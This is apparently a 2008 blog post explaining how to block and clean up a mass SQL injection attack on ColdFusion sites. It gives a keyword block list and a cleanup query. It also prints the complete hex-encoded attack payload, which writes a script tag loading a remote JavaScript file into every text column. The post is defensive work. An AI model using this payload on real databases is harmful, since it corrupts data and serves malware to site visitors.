SQL Injection Attack – Tech Prolonged

ATTACK ON MANY COLDFUSION SITES
On 21-07-2008, there were big SQL Injection Attactks on many of the webites in running under coldfusion.
Reference site : http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065

PREVENTING THE ATTACK
First of all I would like to refer a webpage to you that will show you how can you prevent your websites from these kind of attacks in future. and that will tell you how to implement your <CFQUERY> tag so that no SQL statements can be injected in to the database.
Reference page : http://br.sys-con.com/read/165921.htm
In this page you will also find how the SQL Injection actually works.

above solution is only for you if you have not yet started a new website and just about to start one. so you can write your queries like above in the reference page

PREVENTING THE ATTACK IF ALREADY HAVE A RUNNING WEBSITE
And what if you have a big website developed, that is running publically, and have not coded like the one above.
You can also make changes in your QUERIES like above ( I recomend this ).But if you have a large amount of visits on you website and you can not or you dont want to put your site down for some time to make those changes and to prevent the damage in mean while. Then probably you wil not want to use the above solution.

I would like to provide a quick fix for your website to prevent damange to your site while you make the above changes.
that is to identify the following keywords in the URL and abort the execution of the website.
DECLARE
EXEC(
CAST(
You also have to make sure that you never used these keywords in you website for your own use.
one more thing to take in mind that form values posted by a user with the GET method can also cause a block in the above validation if the user provide any of the above keywords in the form fields. but that will be very rare because the above keywords are not realwords to be used but only the word declare can be cause a block.

the most appropriate location for making these validations is your application.cfm page just u have to validate the above keywords right on the top of your application.cfm page. and if the check returns true then just abort the application by putting the tag <CFABORT>
you can also save the IP address of the user that is trying to inject the SQL by the URL. or also can take othe actions.

RECOVERING IF THE ATTACK HAS BEEN MADE ON YOUR SITE
And if your website/database has already been infected with the following attack (make sure that the long HEX STRING in the CAST function is exactly as follows)

DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F312E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F312E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);
—do not run te above statement—
if you think that your database has been effected with another HEX STRING
then you can try that one with replacing the above string in function CAST.
and make sure that you do not use the EXEC function to check what the above statement is actually doing use PRINT instead but not the EXEC

And if the attack was made by the above HEX STRING then all the nvarchar fields in your database would have been replaced as:
Before attack if the value in the field fieldname1 was yes
then After attack the value in the fieldname1 must be the oldvalue + “></title><script src=”http://1.verynx.cn/w.js”></script><!–
like this fieldname1 = yes“></title><script src=”http://1.verynx.cn/w.js”></script><!–

Then you can run the following query in you SQL Analyser and in the effected database.

SELECT ‘UPDATE [‘ + table_name + ‘]
SET ‘ + column_name + ‘ = REPLACE(CAST(‘ + column_name + ‘ as varchar(8000)), ””></title><script src=”http://1.verynx.cn/w.js”></script><!–”, ””)
WHERE ‘ + column_name + ‘ LIKE ”%”></title><script src=”http://1.verynx.cn/w.js”></script><!–%”’
FROM information_schema.columns where (character_maximum_length is not NULL) AND ([table_name] not like ‘dt%’) AND ([table_name] not like ‘sys%’)

the above query will result a set of update statements. then you can copy those statements and execute them in your SQL Analyser again.

I hope this will help some ones.

PLEASE COMMENT IF GOT ANY QUESTION OR ANY OTHER SUGGESSIONS.

Related News

QuickOffice not upgraded with PR1.1 Nokia N8?

Image Manipulation in Coldfusion MX 6.1 – Issues and Workarounds